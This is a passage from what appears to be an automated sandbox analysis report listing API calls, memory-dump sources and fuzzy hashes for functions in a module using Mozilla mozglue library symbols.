                                                                                                                                                                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAB0BCA
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAB0BD5
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: __aulldiv.LIBCMT ref: 6BA75DB4
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA75DED
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAB0BE2
                                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BAB0C9A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3168180809-0
                                                                                                                                                                                                                                      • Opcode ID: 209995f8cb40f3b8602b89821f10faf6ced1253664b8ad7f73dda59a22346c19
                                                                                                                                                                                                                                      • Instruction ID: a5b29dde4765ba8c340a26f4b2d4894d70de332a383238cdd2bf7f5446c1da67
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 209995f8cb40f3b8602b89821f10faf6ced1253664b8ad7f73dda59a22346c19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C531D7719187149ACB24DF38899051BB7E8EF82760F114B2EF8B5A72D0EB74D8858792
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BA5B7CF
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BA5B808
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BA5B82C
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BA5B840
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA5B849
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1977084945-0
                                                                                                                                                                                                                                      • Opcode ID: 270188aada41f41848cddb8bebc3dd67eec44d6a82f723659731249cbf4ae1cf
                                                                                                                                                                                                                                      • Instruction ID: 883e70433dc7008bfd0359e8c23a356e68c33aec06c54a0f4592d6cdefb8a403
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 270188aada41f41848cddb8bebc3dd67eec44d6a82f723659731249cbf4ae1cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A217AB1D002099FDF00CFA9C8855FFBBB4EF49614F048129EC06A7300E735AA84CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA663D0
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 6BA663DF
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6BA6640E
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6BA66467
                                                                                                                                                                                                                                      • ??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BA664A8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3202982786-0
                                                                                                                                                                                                                                      • Opcode ID: 637931b497b9eb3d16a51613dd146868b18634c5c43dc6d1f34acf28cc1cdd10
                                                                                                                                                                                                                                      • Instruction ID: 3e9bcd11900ea1a4cbec98d62ce7a581602fc0d7ab6d516b3d4feeb09bde68ca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 637931b497b9eb3d16a51613dd146868b18634c5c43dc6d1f34acf28cc1cdd10
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D03149F04083418FDF00DF6CD58969ABBE1EB86254F15851DD89583340D7399886CB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BAB9B74
                                                                                                                                                                                                                                      • ?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BAB9BBA
                                                                                                                                                                                                                                      • ?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BAB9BC8
                                                                                                                                                                                                                                      • ??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BAB9BD7
                                                                                                                                                                                                                                      • ??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6BAB9BE0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2380687156-0
                                                                                                                                                                                                                                      • Opcode ID: ce621fbdc8bd0c02af277c28d42db02466fc82f8ba963ca0d4f4741ee9a940e9
                                                                                                                                                                                                                                      • Instruction ID: 18f354eae2008d6268b86e5c4418750196793836245613618aaf9b93fb69bb62
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce621fbdc8bd0c02af277c28d42db02466fc82f8ba963ca0d4f4741ee9a940e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57118232918348A7CF009F788E5189BB7BCFFD6364F008A0DF9A646141DB35D588C7A2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 6BAB586C
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 6BAB5878
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BAB5898
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BAB58C9
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6BAB58D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$CloseHandleObjectSingleWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1910681409-0
                                                                                                                                                                                                                                      • Opcode ID: 73654e368e8ab47ca03935207a308dd9d45faeed61e3e52590c9a4ddf4cfda26
                                                                                                                                                                                                                                      • Instruction ID: 492169f0c81d47e7da7cc068fbe09bd60c26792e4a298b40af0c36bc8471f6b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73654e368e8ab47ca03935207a308dd9d45faeed61e3e52590c9a4ddf4cfda26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F014F7550C301ABDF019F55D8086077BB9EBC3725764C27DE529C2210E737D9569F81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6BABB0A6,6BABB0A6,?,6BABAF67,?,00000010,?,6BABAF67,?,00000010,00000000,?,?,6BABAB1F), ref: 6BABB1F2
                                                                                                                                                                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6BABB0A6,6BABB0A6,?,6BABAF67,?,00000010,?,6BABAF67,?,00000010,00000000,?), ref: 6BABB1FF
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6BABB0A6,6BABB0A6,?,6BABAF67,?,00000010,?,6BABAF67,?,00000010), ref: 6BABB25F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$Xlength_error@std@@
                                                                                                                                                                                                                                      • String ID: map/set<T> too long
                                                                                                                                                                                                                                      • API String ID: 1922495194-1285458680
                                                                                                                                                                                                                                      • Opcode ID: e8cf2d88a9272e3f8df82e2cd2378e00c09ff76d97fe1a1cc2ab89cd69b5d7bd
                                                                                                                                                                                                                                      • Instruction ID: e9f2e8bfad2deb710d9bee344d1d547fc1d2d780dc6164cc3a0dcef5720c3c9e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8cf2d88a9272e3f8df82e2cd2378e00c09ff76d97fe1a1cc2ab89cd69b5d7bd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76617C74A042459FDB01CF19D9C0A9ABBF5FF49314F98C69AD8694B352C339EC81CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6BAC985D
                                                                                                                                                                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BAC987D
                                                                                                                                                                                                                                      • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6BAC98DE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6BAC98D9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                                                                                                                                                                      • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                                                                                                                                                                      • API String ID: 1778083764-3290996778
                                                                                                                                                                                                                                      • Opcode ID: a753f89ad7983d5e29328d84b912ed99a5f65d8279eb1972c631320cb5a4116d
                                                                                                                                                                                                                                      • Instruction ID: 35069bf82aa3b052175ab0c90035a676f79d890b50d3f1a9c44e9307b0284411
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a753f89ad7983d5e29328d84b912ed99a5f65d8279eb1972c631320cb5a4116d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B315B71E002086FDF14AF69DC455AF77A9EF84718F40802DEA1A9B740DB399981CBE1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(shell32,?,6BACD020), ref: 6BA5F122
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6BA5F132
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: SHGetKnownFolderPath$shell32
                                                                                                                                                                                                                                      • API String ID: 2574300362-1045111711
                                                                                                                                                                                                                                      • Opcode ID: 0c1ffa87853dd4b924d00116aea75b6533418816d4363640b7996f8622ecb7f2
                                                                                                                                                                                                                                      • Instruction ID: 8f0180f3b003e2ab2de8ddb557e9e28cbaffd09a40a794fa89e8399fc213d62c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c1ffa87853dd4b924d00116aea75b6533418816d4363640b7996f8622ecb7f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5019E71604315AFCF008F75DC58A5B7BB8FF8A650B40451DE949D7200DB35EA41CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                      • API String ID: 2429186680-2186867486
                                                                                                                                                                                                                                      • Opcode ID: 0dfe7a6d03a1afcfb74ec3dfd094c80f3cf9a2b9c5ca44968ea70087c938eb79
                                                                                                                                                                                                                                      • Instruction ID: 6fa28fd351409de6b309746e0728db30d7d3968623b73637766e00444d1e6683
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dfe7a6d03a1afcfb74ec3dfd094c80f3cf9a2b9c5ca44968ea70087c938eb79
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEB092704083089BDB102BA4D80DB093B6CB789A01F808A2CA20182251CBB9E1018E61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6BA6237F
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6BA62B9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                                      • Opcode ID: abd718d94072427d3682351b3df71329b4071b7895e1ec67b7b402a39eee324e
                                                                                                                                                                                                                                      • Instruction ID: d0d5d98123903890096fefdbaf02b66636b9415b3ff0843d4458c1b36f63bc2c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abd718d94072427d3682351b3df71329b4071b7895e1ec67b7b402a39eee324e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2E171B1A002059FDF14CF69C590A9EBBB2FF88354F198168D9055B345E779ECC5CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA9188
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA91BB
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA91EB
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA9200
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6BAA8242,?,00000000,?,6BA9B63F), ref: 6BAA9219
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4259248891-0
                                                                                                                                                                                                                                      • Opcode ID: e50c061ac6788b37cb233d140e39184da8b7a31c5bef4651ab259d8d87737740
                                                                                                                                                                                                                                      • Instruction ID: a5232eecbcdec048ad6adde3b9aba1b0ac6317b926cfff4314c96d16819f9921
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e50c061ac6788b37cb233d140e39184da8b7a31c5bef4651ab259d8d87737740
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62312431A006058FEF00CF6CDD4476A77A9EF81700F458A6AD856D7241FB36D989CBB1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE7DC), ref: 6BA90838
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6BA9084C
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6BA908AF
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6BA908BD
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE7DC), ref: 6BA908D5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 837921583-0
                                                                                                                                                                                                                                      • Opcode ID: e3d1699a06bb7c8aaff192793971c679f3c95f9f1c9cd7f5f85e05df4a01ac55
                                                                                                                                                                                                                                      • Instruction ID: f32cc600072cb95ce5d23d4abcf58ceeae69eb444a8765b2e9f1505b49a428e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3d1699a06bb7c8aaff192793971c679f3c95f9f1c9cd7f5f85e05df4a01ac55
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A921B330B243099BDF149F64E844BAEB3F9AF85744F44856CD509A7240DB39E481CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6BAB7250
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADF688), ref: 6BAB7277
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6BAB72C4
